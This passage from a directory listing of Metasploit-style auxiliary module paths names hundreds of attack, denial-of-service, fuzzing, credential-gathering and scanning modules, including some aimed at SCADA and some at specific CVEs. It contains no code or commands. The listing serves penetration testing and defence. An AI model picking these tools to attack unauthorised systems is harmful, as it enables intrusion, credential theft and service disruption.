auxiliary/admin/http/webnms_cred_disclosure | auxiliary/admin/http/webnms_file_download | auxiliary/admin/http/whatsup_gold_sqli | auxiliary/admin/http/wp_automatic_plugin_privesc | auxiliary/admin/http/wp_custom_contact_forms | auxiliary/admin/http/wp_easycart_privilege_escalation | auxiliary/admin/http/wp_gdpr_compliance_privesc | auxiliary/admin/http/wp_google_maps_sqli | auxiliary/admin/http/wp_masterstudy_privesc | auxiliary/admin/http/wp_symposium_sql_injection | auxiliary/admin/http/wp_wplms_privilege_escalation | auxiliary/admin/http/zyxel_admin_password_extractor | . | kerberos (6) . | auxiliary/admin/kerberos/forge_ticket | auxiliary/admin/kerberos/get_ticket | auxiliary/admin/kerberos/inspect_ticket | auxiliary/admin/kerberos/keytab | auxiliary/admin/kerberos/ms14_068_kerberos_checksum | auxiliary/admin/kerberos/ticket_converter | . | ldap (4) . | auxiliary/admin/ldap/ad_cs_cert_template | auxiliary/admin/ldap/rbcd | auxiliary/admin/ldap/shadow_credentials | auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass | . | maxdb (1) . | auxiliary/admin/maxdb/maxdb_cons_exec | . | misc (2) . | auxiliary/admin/misc/sercomm_dump_config | auxiliary/admin/misc/wol | . | motorola (1) . | auxiliary/admin/motorola/wr850g_cred | . | ms (1) . | auxiliary/admin/ms/ms08_059_his2006 | . | mssql (15) . | auxiliary/admin/mssql/mssql_enum | auxiliary/admin/mssql/mssql_enum_domain_accounts | auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli | auxiliary/admin/mssql/mssql_enum_sql_logins | auxiliary/admin/mssql/mssql_escalate_dbowner | auxiliary/admin/mssql/mssql_escalate_dbowner_sqli | auxiliary/admin/mssql/mssql_escalate_execute_as | auxiliary/admin/mssql/mssql_escalate_execute_as_sqli | auxiliary/admin/mssql/mssql_exec | auxiliary/admin/mssql/mssql_findandsampledata | auxiliary/admin/mssql/mssql_idf | auxiliary/admin/mssql/mssql_ntlm_stealer | auxiliary/admin/mssql/mssql_ntlm_stealer_sqli | auxiliary/admin/mssql/mssql_sql | auxiliary/admin/mssql/mssql_sql_file | . | mysql (2) . | auxiliary/admin/mysql/mysql_enum | auxiliary/admin/mysql/mysql_sql | . | natpmp (1) . | auxiliary/admin/natpmp/natpmp_map | . | netbios (1) . | auxiliary/admin/netbios/netbios_spoof | . | networking (13) . | auxiliary/admin/networking/arista_config | auxiliary/admin/networking/brocade_config | auxiliary/admin/networking/cisco_asa_extrabacon | auxiliary/admin/networking/cisco_config | auxiliary/admin/networking/cisco_dcnm_auth_bypass | auxiliary/admin/networking/cisco_dcnm_download | auxiliary/admin/networking/cisco_secure_acs_bypass | auxiliary/admin/networking/cisco_vpn_3000_ftp_bypass | auxiliary/admin/networking/f5_config | auxiliary/admin/networking/juniper_config | auxiliary/admin/networking/mikrotik_config | auxiliary/admin/networking/ubiquiti_config | auxiliary/admin/networking/vyos_config | . | officescan (1) . | auxiliary/admin/officescan/tmlisten_traversal | . | oracle (12) . | post_exploitation (2) . | auxiliary/admin/oracle/post_exploitation/win32exec | auxiliary/admin/oracle/post_exploitation/win32upload | . | auxiliary/admin/oracle/ora_ntlm_stealer | auxiliary/admin/oracle/oracle_index_privesc | auxiliary/admin/oracle/oracle_login | auxiliary/admin/oracle/oracle_sql | auxiliary/admin/oracle/oraenum | auxiliary/admin/oracle/osb_execqr | auxiliary/admin/oracle/osb_execqr2 | auxiliary/admin/oracle/osb_execqr3 | auxiliary/admin/oracle/sid_brute | auxiliary/admin/oracle/tnscmd | . | pop2 (1) . | auxiliary/admin/pop2/uw_fileretrieval | . | postgres (2) . | auxiliary/admin/postgres/postgres_readfile | auxiliary/admin/postgres/postgres_sql | . | sap (5) . | auxiliary/admin/sap/cve_2020_6207_solman_rce | auxiliary/admin/sap/cve_2020_6287_ws_add_user | auxiliary/admin/sap/sap_configservlet_exec_noauth | auxiliary/admin/sap/sap_igs_xmlchart_xxe | auxiliary/admin/sap/sap_mgmt_con_osexec | . | scada (10) . | auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli | auxiliary/admin/scada/ge_proficy_substitute_traversal | auxiliary/admin/scada/modicon_command | auxiliary/admin/scada/modicon_password_recovery | auxiliary/admin/scada/modicon_stux_transfer | auxiliary/admin/scada/moxa_credentials_recovery | auxiliary/admin/scada/multi_cip_command | auxiliary/admin/scada/pcom_command | auxiliary/admin/scada/phoenix_command | auxiliary/admin/scada/yokogawa_bkbcopyd_client | . | serverprotect (1) . | auxiliary/admin/serverprotect/file | . | smb (9) . | auxiliary/admin/smb/check_dir_file | auxiliary/admin/smb/delete_file | auxiliary/admin/smb/download_file | auxiliary/admin/smb/list_directory | auxiliary/admin/smb/ms17_010_command | auxiliary/admin/smb/psexec_ntdsgrab | auxiliary/admin/smb/samba_symlink_traversal | auxiliary/admin/smb/upload_file | auxiliary/admin/smb/webexec_command | . | sunrpc (1) . | auxiliary/admin/sunrpc/solaris_kcms_readfile | . | teradata (1) . | auxiliary/admin/teradata/teradata_odbc_sql | . | tftp (1) . | auxiliary/admin/tftp/tftp_transfer_util | . | tikiwiki (1) . | auxiliary/admin/tikiwiki/tikidblib | . | upnp (1) . | auxiliary/admin/upnp/soap_portmapping | . | vmware (6) . | auxiliary/admin/vmware/poweroff_vm | auxiliary/admin/vmware/poweron_vm | auxiliary/admin/vmware/tag_vm | auxiliary/admin/vmware/terminate_esx_sessions | auxiliary/admin/vmware/vcenter_forge_saml_token | auxiliary/admin/vmware/vcenter_offline_mdb_extract | . | vnc (1) . | auxiliary/admin/vnc/realvnc_41_bypass | . | vxworks (4) . | auxiliary/admin/vxworks/apple_airport_extreme_password | auxiliary/admin/vxworks/dlink_i2eye_autoanswer | auxiliary/admin/vxworks/wdbrpc_memory_dump | auxiliary/admin/vxworks/wdbrpc_reboot | . | webmin (2) . | auxiliary/admin/webmin/edit_html_fileaccess | auxiliary/admin/webmin/file_disclosure | . | wemo (1) . | auxiliary/admin/wemo/crockpot | . | zend (1) . | auxiliary/admin/zend/java_bridge | . | auxiliary/admin/registry_security_descriptor | . | analyze (9) . | auxiliary/analyze/apply_pot | auxiliary/analyze/crack_aix | auxiliary/analyze/crack_databases | auxiliary/analyze/crack_linux | auxiliary/analyze/crack_mobile | auxiliary/analyze/crack_osx | auxiliary/analyze/crack_webapps | auxiliary/analyze/crack_windows | auxiliary/analyze/modbus_zip | . | bnat (2) . | auxiliary/bnat/bnat_router | auxiliary/bnat/bnat_scan | . | client (6) . | hwbridge (1) . | auxiliary/client/hwbridge/connect | . | iec104 (1) . | auxiliary/client/iec104/iec104 | . | mms (1) . | auxiliary/client/mms/send_mms | . | sms (1) . | auxiliary/client/sms/send_text | . | smtp (1) . | auxiliary/client/smtp/emailer | . | telegram (1) . | auxiliary/client/telegram/send_message | . | . | cloud (5) . | aws (4) . | auxiliary/cloud/aws/enum_ec2 | auxiliary/cloud/aws/enum_iam | auxiliary/cloud/aws/enum_s3 | auxiliary/cloud/aws/enum_ssm | . | kubernetes (1) . | auxiliary/cloud/kubernetes/enum_kubernetes | . | . | crawler (1) . | auxiliary/crawler/msfcrawler | . | docx (1) . | auxiliary/docx/word_unc_injector | . | dos (116) . | android (1) . | auxiliary/dos/android/android_stock_browser_iframe | . | apple_ios (1) . | auxiliary/dos/apple_ios/webkit_backdrop_filter_blur | . | cisco (4) . | auxiliary/dos/cisco/cisco_7937g_dos | auxiliary/dos/cisco/cisco_7937g_dos_reboot | auxiliary/dos/cisco/ios_http_percentpercent | auxiliary/dos/cisco/ios_telnet_rocem | . | dhcp (1) . | auxiliary/dos/dhcp/isc_dhcpd_clientid | . | dns (3) . | auxiliary/dos/dns/bind_tkey | auxiliary/dos/dns/bind_tsig | auxiliary/dos/dns/bind_tsig_badtime | . | freebsd (1) . | nfsd (1) . | auxiliary/dos/freebsd/nfsd/nfsd_mount | . | . | ftp (1) . | auxiliary/dos/ftp/vsftpd_232 | . | hp (1) . | auxiliary/dos/hp/data_protector_rds | . | http (34) . | auxiliary/dos/http/3com_superstack_switch | auxiliary/dos/http/apache_commons_fileupload_dos | auxiliary/dos/http/apache_mod_isapi | auxiliary/dos/http/apache_range_dos | auxiliary/dos/http/apache_tomcat_transfer_encoding | auxiliary/dos/http/brother_debut_dos | auxiliary/dos/http/cable_haunt_websocket_dos | auxiliary/dos/http/canon_wireless_printer | auxiliary/dos/http/dell_openmanage_post | auxiliary/dos/http/f5_bigip_apm_max_sessions | auxiliary/dos/http/flexense_http_server_dos | auxiliary/dos/http/gzip_bomb_dos | auxiliary/dos/http/hashcollision_dos | auxiliary/dos/http/ibm_lotus_notes | auxiliary/dos/http/ibm_lotus_notes2 | auxiliary/dos/http/marked_redos | auxiliary/dos/http/metasploit_httphandler_dos | auxiliary/dos/http/monkey_headers | auxiliary/dos/http/ms15_034_ulonglongadd | auxiliary/dos/http/nodejs_pipelining | auxiliary/dos/http/novell_file_reporter_heap_bof | auxiliary/dos/http/rails_action_view | auxiliary/dos/http/rails_json_float_dos | auxiliary/dos/http/slowloris | auxiliary/dos/http/sonicwall_ssl_format | auxiliary/dos/http/squid_range_dos | auxiliary/dos/http/tautulli_shutdown_exec | auxiliary/dos/http/ua_parser_js_redos | auxiliary/dos/http/webkitplus | auxiliary/dos/http/webrick_regex | auxiliary/dos/http/wordpress_directory_traversal_dos | auxiliary/dos/http/wordpress_long_password_dos | auxiliary/dos/http/wordpress_xmlrpc_dos | auxiliary/dos/http/ws_dos | . | mdns (1) . | auxiliary/dos/mdns/avahi_portzero | . | mirageos (1) . | auxiliary/dos/mirageos/qubes_mirage_firewall_dos | . | misc (4) . | auxiliary/dos/misc/dopewars | auxiliary/dos/misc/ibm_sametime_webplayer_dos | auxiliary/dos/misc/ibm_tsm_dos | auxiliary/dos/misc/memcached | . | ntp (1) . | auxiliary/dos/ntp/ntpd_reserved_dos | . | pptp (1) . | auxiliary/dos/pptp/ms02_063_pptp_dos | . | rpc (1) . | auxiliary/dos/rpc/rpcbomb | . | samba (3) . | auxiliary/dos/samba/lsa_addprivs_heap | auxiliary/dos/samba/lsa_transnames_heap | auxiliary/dos/samba/read_nttrans_ea_list | . | sap (1) . | auxiliary/dos/sap/sap_soap_rfc_eps_delete_file | . | scada (6) . | auxiliary/dos/scada/allen_bradley_pccc | auxiliary/dos/scada/beckhoff_twincat | auxiliary/dos/scada/d20_tftp_overflow | auxiliary/dos/scada/igss9_dataserver | auxiliary/dos/scada/siemens_siprotec4 | auxiliary/dos/scada/yokogawa_logsvr | . | smb (1) . | auxiliary/dos/smb/smb_loris | . | smtp (1) . | auxiliary/dos/smtp/sendmail_prescan | . | solaris (1) . | lpd (1) . | auxiliary/dos/solaris/lpd/cascade_delete | . | . | ssl (3) . | auxiliary/dos/ssl/dtls_changecipherspec | auxiliary/dos/ssl/dtls_fragment_overflow | auxiliary/dos/ssl/openssl_aesni | . | syslog (1) . | auxiliary/dos/syslog/rsyslog_long_tag | . | tcp (3) . | auxiliary/dos/tcp/claymore_dos | auxiliary/dos/tcp/junos_tcp_opt | auxiliary/dos/tcp/synflood | . | upnp (1) . | auxiliary/dos/upnp/miniupnpd_dos | . | windows (35) . | appian (1) . | auxiliary/dos/windows/appian/appian_bpm | . | browser (1) . | auxiliary/dos/windows/browser/ms09_065_eot_integer | . | ftp (11) . | auxiliary/dos/windows/ftp/filezilla_admin_user | auxiliary/dos/windows/ftp/filezilla_server_port | auxiliary/dos/windows/ftp/guildftp_cwdlist | auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof | auxiliary/dos/windows/ftp/iis_list_exhaustion | auxiliary/dos/windows/ftp/solarftp_user | auxiliary/dos/windows/ftp/titan626_site | auxiliary/dos/windows/ftp/vicftps50_list | auxiliary/dos/windows/ftp/winftp230_nlst | auxiliary/dos/windows/ftp/xmeasy560_nlst | auxiliary/dos/windows/ftp/xmeasy570_nlst | . | games (1) . | auxiliary/dos/windows/games/kaillera | . | http (3) . | auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166 | auxiliary/dos/windows/http/ms10_065_ii6_asp_dos | auxiliary/dos/windows/http/pi3web_isapi | . | llmnr (1) . | auxiliary/dos/windows/llmnr/ms11_030_dnsapi | . | nat (1) . | auxiliary/dos/windows/nat/nat_helper | . | rdp (1) . | auxiliary/dos/windows/rdp/ms12_020_maxchannelids | . | smb (11) . | auxiliary/dos/windows/smb/ms05_047_pnp | auxiliary/dos/windows/smb/ms06_035_mailslot | auxiliary/dos/windows/smb/ms06_063_trans | auxiliary/dos/windows/smb/ms09_001_write | auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh | auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff | auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop | auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow | auxiliary/dos/windows/smb/ms11_019_electbowser | auxiliary/dos/windows/smb/rras_vls_null_deref | auxiliary/dos/windows/smb/vista_negotiate_stop | . | smtp (1) . | auxiliary/dos/windows/smtp/ms06_019_exchange | . | ssh (1) . | auxiliary/dos/windows/ssh/sysax_sshd_kexchange | . | tftp (2) . | auxiliary/dos/windows/tftp/pt360_write | auxiliary/dos/windows/tftp/solarwinds | . | . | wireshark (4) . | auxiliary/dos/wireshark/capwap | auxiliary/dos/wireshark/chunked | auxiliary/dos/wireshark/cldap | auxiliary/dos/wireshark/ldap | . | . | fileformat (3) . | auxiliary/fileformat/badpdf | auxiliary/fileformat/multidrop | auxiliary/fileformat/odt_badodt | . | fuzzers (21) . | dns (1) . | auxiliary/fuzzers/dns/dns_fuzzer | . | ftp (2) . | auxiliary/fuzzers/ftp/client_ftp | auxiliary/fuzzers/ftp/ftp_pre_post | . | http (3) . | auxiliary/fuzzers/http/http_form_field | auxiliary/fuzzers/http/http_get_uri_long | auxiliary/fuzzers/http/http_get_uri_strings | . | ntp (1) . | auxiliary/fuzzers/ntp/ntp_protocol_fuzzer | . | smb (7) . | auxiliary/fuzzers/smb/smb2_negotiate_corrupt | auxiliary/fuzzers/smb/smb_create_pipe | auxiliary/fuzzers/smb/smb_create_pipe_corrupt | auxiliary/fuzzers/smb/smb_negotiate_corrupt | auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt | auxiliary/fuzzers/smb/smb_tree_connect | auxiliary/fuzzers/smb/smb_tree_connect_corrupt | . | smtp (1) . | auxiliary/fuzzers/smtp/smtp_fuzzer | . | ssh (4) . | auxiliary/fuzzers/ssh/ssh_kexinit_corrupt | auxiliary/fuzzers/ssh/ssh_version_15 | auxiliary/fuzzers/ssh/ssh_version_2 | auxiliary/fuzzers/ssh/ssh_version_corrupt | . | tds (2) . | auxiliary/fuzzers/tds/tds_login_corrupt | auxiliary/fuzzers/tds/tds_login_username | . | . | gather (155) . | auxiliary/gather/adobe_coldfusion_fileread_cve_2023_26360 | auxiliary/gather/advantech_webaccess_creds | auxiliary/gather/alienvault_iso27001_sqli | auxiliary/gather/alienvault_newpolicyform_sqli | auxiliary/gather/android_browser_file_theft | auxiliary/gather/android_browser_new_tab_cookie_theft | auxiliary/gather/android_htmlfileprovider | auxiliary/gather/android_object_tag_webview_uxss | auxiliary/gather/android_stock_browser_uxss | auxiliary/gather/apache_rave_creds | auxiliary/gather/apache_superset_cookie_sig_priv_esc | auxiliary/gather/apple_safari_ftp_url_cookie_theft | auxiliary/gather/apple_safari_webarchive_uxss | auxiliary/gather/asrep | auxiliary/gather/asterisk_creds | auxiliary/gather/avtech744_dvr_accounts | auxiliary/gather/billquick_txtid_sqli | auxiliary/gather/browser_info | auxiliary/gather/browser_lanipleak | auxiliary/gather/c2s_dvr_password_disclosure | auxiliary/gather/censys_search | auxiliary/gather/cerberus_helpdesk_hash_disclosure | auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919 | auxiliary/gather/checkpoint_hostname | auxiliary/gather/chrome_debugger | auxiliary/gather/cisco_pvc2300_download_config | auxiliary/gather/cisco_rv320_config | auxiliary/gather/citrix_published_applications | auxiliary/gather/citrix_published_bruteforce | auxiliary/gather/cloud_lookup | auxiliary/gather/coldfusion_pms_servlet_file_read | auxiliary/gather/coldfusion_pwd_props | auxiliary/gather/corpwatch_lookup_id | auxiliary/gather/corpwatch_lookup_name | auxiliary/gather/crushftp_fileread_cve_2024_4040 | auxiliary/gather/cve_2021_27850_apache_tapestry_hmac_key | auxiliary/gather/d20pass | auxiliary/gather/darkcomet_filedownloader | auxiliary/gather/dolibarr_creds_sqli | auxiliary/gather/doliwamp_traversal_creds | auxiliary/gather/drupal_openid_xxe | auxiliary/gather/eaton_nsm_creds | auxiliary/gather/elasticsearch_enum | auxiliary/gather/emc_cta_xxe | auxiliary/gather/enum_dns | auxiliary/gather/eventlog_cred_disclosure | auxiliary/gather/exchange_proxylogon_collector | auxiliary/gather/external_ip | auxiliary/gather/f5_bigip_cookie_disclosure | auxiliary/gather/firefox_pdfjs_file_theft | auxiliary/gather/flash_rosetta_jsonp_url_disclosure | auxiliary/gather/fortios_vpnssl_traversal_creds_leak | auxiliary/gather/get_user_spns | auxiliary/gather/gitlab_authenticated_subgroups_file_read | auxiliary/gather/gitlab_tags_rss_feed_email_disclosure | auxiliary/gather/grandstream_ucm62xx_sql_account_guess | auxiliary/gather/hikvision_info_disclosure_cve_2017_7921 | auxiliary/gather/hp_enum_perfd | auxiliary/gather/hp_snac_domain_creds | auxiliary/gather/http_pdf_authors | auxiliary/gather/huawei_wifi_info | auxiliary/gather/ibm_bigfix_sites_packages_enum | auxiliary/gather/ibm_sametime_enumerate_users | auxiliary/gather/ibm_sametime_room_brute | auxiliary/gather/ibm_sametime_version | auxiliary/gather/ie_sandbox_findfiles | auxiliary/gather/ie_uxss_injection | auxiliary/gather/impersonate_ssl | auxiliary/gather/ipcamera_password_disclosure | auxiliary/gather/jasmin_ransomware_dir_traversal | auxiliary/gather/jasmin_ransomware_sqli | auxiliary/gather/java_rmi_registry | auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read | auxiliary/gather/jenkins_cred_recovery | auxiliary/gather/jetty_web_inf_disclosure | auxiliary/gather/joomla_com_realestatemanager_sqli | auxiliary/gather/joomla_contenthistory_sqli | auxiliary/gather/joomla_weblinks_sqli | auxiliary/gather/kerberos_enumusers | auxiliary/gather/konica_minolta_pwd_extract | auxiliary/gather/lansweeper_collector | auxiliary/gather/ldap_esc_vulnerable_cert_finder | auxiliary/gather/ldap_hashdump | auxiliary/gather/ldap_query | auxiliary/gather/magento_xxe_cve_2024_34102 | auxiliary/gather/manageengine_adaudit_plus_xnode_enum | auxiliary/gather/manageengine_datasecurity_plus_xnode_enum | auxiliary/gather/mantisbt_admin_sqli | auxiliary/gather/mcafee_epo_xxe | auxiliary/gather/memcached_extractor | auxiliary/gather/microweber_lfi | auxiliary/gather/mikrotik_winbox_fileread | auxiliary/gather/minio_bootstrap_verify_info_disc | auxiliary/gather/mongodb_js_inject_collection_enum | auxiliary/gather/mongodb_ops_manager_diagnostic_archive_info | auxiliary/gather/ms14_052_xmldom | auxiliary/gather/mybb_db_fingerprint | auxiliary/gather/natpmp_external_address | auxiliary/gather/netgear_password_disclosure | auxiliary/gather/nis_bootparamd_domain | auxiliary/gather/nis_ypserv_map | auxiliary/gather/nuuo_cms_bruteforce | auxiliary/gather/nuuo_cms_file_download | auxiliary/gather/oats_downloadservlet_traversal | auxiliary/gather/office365userenum | auxiliary/gather/opennms_xxe | auxiliary/gather/owncloud_phpinfo_reader | auxiliary/gather/peplink_bauth_sqli | auxiliary/gather/pimcore_creds_sqli | auxiliary/gather/piwigo_cve_2023_26876 | auxiliary/gather/progress_moveit_sftp_fileread_cve_2024_5806 | auxiliary/gather/prometheus_api_gather | auxiliary/gather/prometheus_node_exporter_gather | auxiliary/gather/pulse_secure_file_disclosure | auxiliary/gather/python_flask_cookie_signer | auxiliary/gather/qnap_backtrace_admin_hash | auxiliary/gather/qnap_lfi | auxiliary/gather/rails_doubletap_file_read | auxiliary/gather/rancher_authenticated_api_cred_exposure | auxiliary/gather/ray_lfi_cve_2023_6020 | auxiliary/gather/redis_extractor | auxiliary/gather/roundcube_auth_file_read | auxiliary/gather/safari_file_url_navigation | auxiliary/gather/saltstack_salt_root_key | auxiliary/gather/samsung_browser_sop_bypass | auxiliary/gather/search_email_collector | auxiliary/gather/searchengine_subdomains_collector | auxiliary/gather/shodan_honeyscore | auxiliary/gather/shodan_host | auxiliary/gather/shodan_search | auxiliary/gather/snare_registry | auxiliary/gather/solarwinds_orion_sqli | auxiliary/gather/solarwinds_servu_fileread_cve_2024_28995 | auxiliary/gather/splunk_raw_server_info | auxiliary/gather/ssllabs_scan | auxiliary/gather/suite_crm_export_sqli | auxiliary/gather/teamtalk_creds | auxiliary/gather/tplink_archer_c7_traversal | auxiliary/gather/trackit_sql_domain_creds | auxiliary/gather/vbulletin_getindexablecontent_sqli | auxiliary/gather/vbulletin_vote_sqli | auxiliary/gather/vmware_vcenter_vmdir_ldap | auxiliary/gather/windows_deployment_services_shares | auxiliary/gather/windows_secrets_dump | auxiliary/gather/wp_all_in_one_migration_export | auxiliary/gather/wp_bookingpress_category_services_sqli | auxiliary/gather/wp_ultimate_csv_importer_user_extract | auxiliary/gather/wp_w3_total_cache_hash_extract | auxiliary/gather/xbmc_traversal | auxiliary/gather/xerox_pwd_extract | auxiliary/gather/xerox_workcentre_5xxx_ldap | auxiliary/gather/xymon_info | auxiliary/gather/zabbix_toggleids_sqli | auxiliary/gather/zookeeper_info_disclosure | auxiliary/gather/zoomeye_search | . | parser (1) . | auxiliary/parser/unattend | . | pdf (1) . | foxit (1) . | auxiliary/pdf/foxit/authbypass | . | . | scanner (634) . | acpp (1) . | auxiliary/scanner/acpp/login | . | afp (2) . | auxiliary/scanner/afp/afp_login | auxiliary/scanner/afp/afp_server_info | . | amqp (2) . | auxiliary/scanner/amqp/amqp_login | auxiliary/scanner/amqp/amqp_version | . | backdoor (1) . | auxiliary/scanner/backdoor/energizer_duo_detect | . | chargen (1) . | auxiliary/scanner/chargen/chargen_probe | . | couchdb (2) . | auxiliary/scanner/couchdb/couchdb_enum | auxiliary/scanner/couchdb/couchdb_login | . | db2 (3) . | auxiliary/scanner/db2/db2_auth | auxiliary/scanner/db2/db2_version | auxiliary/scanner/db2/discovery | . | dcerpc (8) . | auxiliary/scanner/dcerpc/dfscoerce | auxiliary/scanner/dcerpc/endpoint_mapper | auxiliary/scanner/dcerpc/hidden | auxiliary/scanner/dcerpc/management | auxiliary/scanner/dcerpc/nrpc_enumusers | auxiliary/scanner/dcerpc/petitpotam | auxiliary/scanner/dcerpc/tcp_dcerpc_auditor | auxiliary/scanner/dcerpc/windows_deployment_services | . | dect (2) . | auxiliary/scanner/dect/call_scanner | auxiliary/scanner/dect/station_scanner | . | discovery (7) . | auxiliary/scanner/discovery/arp_sweep | auxiliary/scanner/discovery/empty_udp | auxiliary/scanner/discovery/ipv6_multicast_ping | auxiliary/scanner/discovery/ipv6_neighbor | auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement | auxiliary/scanner/discovery/udp_probe | auxiliary/scanner/discovery/udp_sweep | . | dlsw (1) . | auxiliary/scanner/dlsw/dlsw_leak_capture | . | dns (1) . | auxiliary/scanner/dns/dns_amp | . | emc (2) . | auxiliary/scanner/emc/alphastor_devicemanager | auxiliary/scanner/emc/alphastor_librarymanager | . | etcd (2) . | auxiliary/scanner/etcd/open_key_scanner | auxiliary/scanner/etcd/version | . | finger (1) . | auxiliary/scanner/finger/finger_users | . | ftp (9) . | auxiliary/scanner/ftp/anonymous | auxiliary/scanner/ftp/bison_ftp_traversal | auxiliary/scanner/ftp/colorado_ftp_traversal | auxiliary/scanner/ftp/easy_file_sharing_ftp | auxiliary/scanner/ftp/ftp_login | auxiliary/scanner/ftp/ftp_version | auxiliary/scanner/ftp/konica_ftp_traversal | auxiliary/scanner/ftp/pcman_ftp_traversal | auxiliary/scanner/ftp/titanftp_xcrc_traversal | . | gopher (1) . | auxiliary/scanner/gopher/gopher_gophermap | . | gprs (1) . | auxiliary/scanner/gprs/gtp_echo | . | h323 (1) . | auxiliary/scanner/h323/h323_version | . | http (299) . | auxiliary/scanner/http/a10networks_ax_directory_traversal | auxiliary/scanner/http/accellion_fta_statecode_file_read | auxiliary/scanner/http/adobe_xml_inject | auxiliary/scanner/http/advantech_webaccess_login | auxiliary/scanner/http/allegro_rompager_misfortune_cookie | auxiliary/scanner/http/apache_activemq_source_disclosure | auxiliary/scanner/http/apache_activemq_traversal | auxiliary/scanner/http/apache_flink_jobmanager_traversal | auxiliary/scanner/http/apache_mod_cgi_bash_env | auxiliary/scanner/http/apache_nifi_login | auxiliary/scanner/http/apache_nifi_version | auxiliary/scanner/http/apache_normalize_path | auxiliary/scanner/http/apache_optionsbleed | auxiliary/scanner/http/apache_userdir_enum | auxiliary/scanner/http/appletv_login | auxiliary/scanner/http/atlassian_crowd_fileaccess | auxiliary/scanner/http/axis_local_file_include | auxiliary/scanner/http/axis_login | auxiliary/scanner/http/azure_ad_login | auxiliary/scanner/http/backup_file | auxiliary/scanner/http/barracuda_directory_traversal | auxiliary/scanner/http/bavision_cam_login | auxiliary/scanner/http/binom3_login_config_pass_dump | auxiliary/scanner/http/bitweaver_overlay_type_traversal | auxiliary/scanner/http/blind_sql_query | auxiliary/scanner/http/bmc_trackit_passwd_reset | auxiliary/scanner/http/brute_dirs | auxiliary/scanner/http/buffalo_login | auxiliary/scanner/http/buildmaster_login | auxiliary/scanner/http/caidao_bruteforce_login | auxiliary/scanner/http/canon_wireless | auxiliary/scanner/http/cassandra_web_file_read | auxiliary/scanner/http/cert | auxiliary/scanner/http/cgit_traversal | auxiliary/scanner/http/chef_webui_login | auxiliary/scanner/http/chromecast_webserver | auxiliary/scanner/http/chromecast_wifi | auxiliary/scanner/http/cisco_asa_asdm_bruteforce | auxiliary/scanner/http/cisco_asa_clientless_vpn | auxiliary/scanner/http/cisco_device_manager | auxiliary/scanner/http/cisco_directory_traversal | auxiliary/scanner/http/cisco_firepower_download | auxiliary/scanner/http/cisco_firepower_login | auxiliary/scanner/http/cisco_ios_auth_bypass | auxiliary/scanner/http/cisco_ironport_enum | auxiliary/scanner/http/cisco_nac_manager_traversal | auxiliary/scanner/http/cisco_ssl_vpn | auxiliary/scanner/http/cisco_ssl_vpn_priv_esc | auxiliary/scanner/http/citrix_bleed_cve_2023_4966 | auxiliary/scanner/http/citrix_dir_traversal | auxiliary/scanner/http/clansphere_traversal | auxiliary/scanner/http/cnpilot_r_web_login_loot | auxiliary/scanner/http/coldfusion_locale_traversal | auxiliary/scanner/http/coldfusion_version | auxiliary/scanner/http/concrete5_member_list | auxiliary/scanner/http/copy_of_file | auxiliary/scanner/http/crawler | auxiliary/scanner/http/dell_idrac | auxiliary/scanner/http/dicoogle_traversal | auxiliary/scanner/http/dir_listing | auxiliary/scanner/http/dir_scanner | auxiliary/scanner/http/dir_webdav_unicode_bypass | auxiliary/scanner/http/directadmin_login | auxiliary/scanner/http/dlink_dir_300_615_http_login | auxiliary/scanner/http/dlink_dir_615h_http_login | auxiliary/scanner/http/dlink_dir_session_cgi_http_login | auxiliary/scanner/http/dlink_user_agent_backdoor | auxiliary/scanner/http/dnalims_file_retrieve | auxiliary/scanner/http/docker_version | auxiliary/scanner/http/dolibarr_16_contact_dump | auxiliary/scanner/http/dolibarr_login | auxiliary/scanner/http/drupal_views_user_enum | auxiliary/scanner/http/ektron_cms400net | auxiliary/scanner/http/elasticsearch_memory_disclosure | auxiliary/scanner/http/elasticsearch_traversal | auxiliary/scanner/http/emby_ssrf_scanner | auxiliary/scanner/http/emby_version_ssrf | auxiliary/scanner/http/enum_wayback | auxiliary/scanner/http/epmp1000_dump_config | auxiliary/scanner/http/epmp1000_dump_hashes | auxiliary/scanner/http/epmp1000_get_chart_cmd_exec | auxiliary/scanner/http/epmp1000_ping_cmd_exec | auxiliary/scanner/http/epmp1000_reset_pass | auxiliary/scanner/http/epmp1000_web_login | auxiliary/scanner/http/error_sql_injection | auxiliary/scanner/http/es_file_explorer_open_port | auxiliary/scanner/http/etherpad_duo_login | auxiliary/scanner/http/exchange_proxylogon | auxiliary/scanner/http/exchange_web_server_pushsubscription | auxiliary/scanner/http/f5_bigip_virtual_server | auxiliary/scanner/http/f5_mgmt_scanner | auxiliary/scanner/http/file_same_name_dir | auxiliary/scanner/http/files_dir | auxiliary/scanner/http/fortimail_login_bypass_detection | auxiliary/scanner/http/fortinet_ssl_vpn | auxiliary/scanner/http/frontpage_credential_dump | auxiliary/scanner/http/frontpage_login | auxiliary/scanner/http/gavazzi_em_login_loot | auxiliary/scanner/http/git_scanner | auxiliary/scanner/http/gitlab_graphql_user_enum | auxiliary/scanner/http/gitlab_login | auxiliary/scanner/http/gitlab_user_enum | auxiliary/scanner/http/gitlab_version | auxiliary/scanner/http/glassfish_login | auxiliary/scanner/http/glassfish_traversal | auxiliary/scanner/http/goahead_traversal | auxiliary/scanner/http/grafana_plugin_traversal | auxiliary/scanner/http/groupwise_agents_http_traversal | auxiliary/scanner/http/host_header_injection | auxiliary/scanner/http/hp_imc_bims_downloadservlet_traversal | auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal | auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal | auxiliary/scanner/http/hp_imc_reportimgservlt_traversal | auxiliary/scanner/http/hp_imc_som_file_download | auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess | auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration | auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess | auxiliary/scanner/http/hp_sys_mgmt_login | auxiliary/scanner/http/http_header | auxiliary/scanner/http/http_hsts | auxiliary/scanner/http/http_login | 